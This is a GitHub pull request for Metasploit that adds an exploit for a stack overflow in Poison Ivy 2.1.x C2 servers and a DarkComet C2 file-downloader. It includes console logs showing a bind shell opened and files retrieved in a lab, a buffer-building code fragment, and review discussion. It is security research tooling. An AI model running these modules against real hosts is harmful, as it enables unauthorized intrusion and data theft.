Exploit for previously unknown stack buffer overflow in Poison Ivy versions 2.1.x (possibly present in older versions too) #6940
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
…rability in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't require knowledge of the secret key as it abuses a flaw in the cryptographic protocol. Note that this is a different vulnerability from the one affecting versions 2.2.0 and up (https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof). See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware for details. ## Console output Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is set to 'pivypass' and unknown to attacker). ### Version 2.1.4 ``` msf > use windows/misc/poisonivy_21x_bof msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104 RHOST => 192.168.0.104 msf exploit(poisonivy_21x_bof) > check [*] 192.168.0.104:3460 The target appears to be vulnerable. msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp PAYLOAD => windows/shell_bind_tcp msf exploit(poisonivy_21x_bof) > exploit [*] 192.168.0.104:3460 - Performing handshake... [*] Started bind handler [*] 192.168.0.104:3460 - Sending exploit... [*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4> ```
…of DarkComet versions 3.2 and up (https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf), possibly affecting earlier versions as well. The vulnerability can be exploited without knowledge of the secret key by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing for key recovery after which the exploit can be used to download arbitrary files from a DarkComet C2 server. See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware for details. ## Console output Below is an example of the exploit running against versions 5.3.1 and 4.2F (DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker). ### Version 5.3.1 (unknown password) ``` msf > use auxiliary/gather/darkcomet_filedownloader msf auxiliary(darkcomet_filedownloader) > show options Module options (auxiliary/gather/darkcomet_filedownloader): Name Current Setting Required Description ---- --------------- -------- ----------- BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password) LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server) NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1 RHOST 0.0.0.0 yes The target address RPORT 1604 yes The target port STORE_LOOT true no Store file in loot (will simply output file to console if set to false). TARGETFILE no Target file to download (assumes password is set) msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104 RHOST => 192.168.0.104 msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102 LHOST => 192.168.0.102 msf auxiliary(darkcomet_filedownloader) > run [*] 192.168.0.104:1604 - C2 server uses password [darkcometpass] [*] 192.168.0.104:1604 - Storing data to loot... [*] Auxiliary module execution completed msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false STORE_LOOT => false msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass KEY => #KCMDDC51#-890darkcometpass msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt TARGETFILE => C:\secret.txt msf auxiliary(darkcomet_filedownloader) > run [*] 192.168.0.104:1604 - omgsecret [*] Auxiliary module execution completed ``` ### Version 4.2F (unknown password) ``` msf > use auxiliary/gather/darkcomet_filedownloader msf auxiliary(darkcomet_filedownloader) > show options Module options (auxiliary/gather/darkcomet_filedownloader): Name Current Setting Required Description ---- --------------- -------- ----------- BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password) LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server) NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1 RHOST 0.0.0.0 yes The target address RPORT 1604 yes The target port STORE_LOOT true no Store file in loot (will simply output file to console if set to false). TARGETFILE no Target file to download (assumes password is set) msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104 RHOST => 192.168.0.104 msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102 LHOST => 192.168.0.102 msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false NEWVERSION => false msf auxiliary(darkcomet_filedownloader) > run [*] 192.168.0.104:1604 - Missing 1 bytes of keystream ... [*] 192.168.0.104:1604 - Initiating brute force ... [*] 192.168.0.104:1604 - C2 server uses password [darkcometpass] [*] 192.168.0.104:1604 - Storing data to loot... [*] Auxiliary module execution completed msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass KEY => #KCMDDC42F#-890darkcometpass msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false STORE_LOOT => false msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt TARGETFILE => C:\secret.txt msf auxiliary(darkcomet_filedownloader) > run [*] 192.168.0.104:1604 - omgsecret [*] Auxiliary module execution completed ```
|
Hi @samvartaka I don't have time to read through your blog post at the moment or audit the module immediately, but could you provide a download for the Poison Ivy binary? |
|
Sure, if i'm not mistaken this should be the PIVY 2.1.4 C2 server https://mega.nz/#!plgk3K6Q!_m3Tou3ILsOp4z4oamH9b-n4kCQLg5hYD-RVJaq2C14 I ran it against a Windows XP SP3 (EN) 32-bit machine but seeing as how the only gadget is located in the executable image itself i suppose that shouldn't matter much other than that PIVY apparently doesn't run on newer Windows versions than XP without some patch. |
|
Thanks, I'll take a look when I can. |
| compressedBuffer = payload.encoded + "\x90" * (0xFFD - payload.encoded.length) | ||
|
|
||
| # Construct exploit buffer | ||
| exploitBuffer = "A" * 4 # infoLen (placeholder) |
There was a problem hiding this comment.
I guess you could randomize these instead of ABCDs? Like:
Rex::Text.rand_text_alpha(4)
|
Good call @wchen-r7, I implemented your suggestions and confirmed the exploit still works fine against the 2.1.4 target. |
|
@samvartaka Awesome. Thanks! 👍 |
|
Tested and working. Nicely spotted on the actual vuln. Merging |
|
Samvartaka, when I load this exploit in Metasploit and run it, it gives me the following error. Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/poison_ivy_c2/chunk_214.bin What might be the issue? Can you please suggest a solution? |
|
Looks like you somehow didn't check out all files part of this commit, as per @wchen-r7's suggestion i stored the protocol known plaintext in a binary file named chunk_214.bin, you can find it here: https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/poison_ivy_c2 Maybe retry syncing your local repo, download the file separately, or do a new checkout? |
|
@LoganHunt Make sure you |
|
This looks like Kali linux. I double-checked and the latest rolling release package has the file included. |
6 tasks
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module exploits a previously unknown stack buffer overflow vulnerability
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't
require knowledge of the secret key as it abuses a flaw in the cryptographic protocol.
Note that this is a different vulnerability from the one affecting versions 2.2.0 and up
(https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof).
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
Console output
Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is
set to 'pivypass' and unknown to attacker).
Version 2.1.4